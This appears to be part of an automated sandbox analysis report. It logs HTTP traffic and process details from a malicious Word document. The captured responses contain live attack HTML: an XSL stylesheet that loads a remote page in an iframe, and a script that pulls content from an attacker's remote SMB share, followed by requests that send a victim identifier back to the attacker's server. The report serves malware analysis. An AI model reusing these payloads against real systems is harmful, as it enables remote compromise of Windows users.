Date: Mon, 03 Jul 2023 17:17:36 GMT
Content-Length: 576
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='#'?><xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns=""><xsl:template match="/"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head><body><iframe src='RFile.asp' width='800' height='800'></iframe><script defer=''>lt=String.fromCharCode(60);gt=String.fromCharCode(62);</script></body></html></xsl:template></xsl:stylesheet>
Jul 3, 2023 19:17:44.381493092 CEST | 413 | OUT | GET /MSHTML_C7/RFile.asp HTTP/1.1
Accept: */*
Referer: http://74.50.94.156/MSHTML_C7/start.xml
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Jul 3, 2023 19:17:48.182789087 CEST | 413 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDCSTDATTC=OPCBNNGBHENKOCPNEGOGNIPF; path=/
Date: Mon, 03 Jul 2023 17:17:48 GMT
Content-Length: 292
                                                                                                                                          Data Ascii: <html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_4f657_file001.htm?d=84.17.52.5_4f657_></iframe>'; } </script></body></html>
Jul 3, 2023 19:18:29.230432034 CEST | 769 | OUT | GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Jul 3, 2023 19:18:30.853779078 CEST | 771 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP; path=/
Date: Mon, 03 Jul 2023 17:18:30 GMT
Content-Length: 66
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
Jul 3, 2023 19:18:32.241492987 CEST | 771 | OUT | GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Jul 3, 2023 19:18:32.888693094 CEST | 772 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 03 Jul 2023 17:18:32 GMT
Content-Length: 66
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
Jul 3, 2023 19:18:34.623435974 CEST | 772 | OUT | GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Jul 3, 2023 19:18:34.725302935 CEST | 773 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 03 Jul 2023 17:18:34 GMT
Content-Length: 66
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>



Target ID: 0
Start time: 19:17:20
Start date: 03/07/2023
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x140000
File size: 1'937'688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 19:17:36
Start date: 03/07/2023
Path: C:\Windows\splwow64.exe
Wow64 process (32bit): false
Commandline: C:\Windows\splwow64.exe 12288
Imagebase: 0x7ff726350000
File size: 130'560 bytes
MD5 hash: 8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                          No disassembly